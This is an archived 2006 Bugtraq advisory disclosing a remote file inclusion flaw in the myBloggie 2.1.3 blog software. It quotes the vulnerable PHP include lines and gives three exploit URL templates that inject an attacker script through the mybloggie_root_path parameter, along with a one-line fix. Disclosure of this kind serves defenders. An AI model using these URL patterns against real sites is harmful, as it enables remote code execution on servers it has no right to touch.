lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060809181415.16271.qmail@securityfocus.com>
Date: 9 Aug 2006 18:14:15 -0000
From: sh3ll@...ll.ir
To: bugtraq@...urityfocus.com
Subject: myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion
 Vulnerability

-----------------------------------------------------------------------------------------
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion
-----------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/04/29
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email    : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
-----------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : myBloggie
version     : 2.1.3
URL         : http://www.mywebland.com , http://mybloggie.mywebland.com
Description : 
myBloggie is considered one of the most simple, user-friendliest yet packed
with features Weblog system available to date.
-----------------------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~
in admin.php , index.php & db.php We Found Vulnerability Scripts
----------------------------------------admin.php----------------------------------------
....
<?php
        include($mybloggie_root_path.'spacer6.php');
        ?>
...
----------------------------------------index.php----------------------------------------
....
<?php
}
if (!isset($mode)) {
    include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}

// End right sidemenu condition

// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
include($mybloggie_root_path.'searchform.php');
include($mybloggie_root_path.'spacer.php');
}
...    

-------------------------------------------db.php----------------------------------------
....
<?php
       include($mybloggie_root_path .'includes/mysql.php');
       ?>
...
-----------------------------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php
-----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ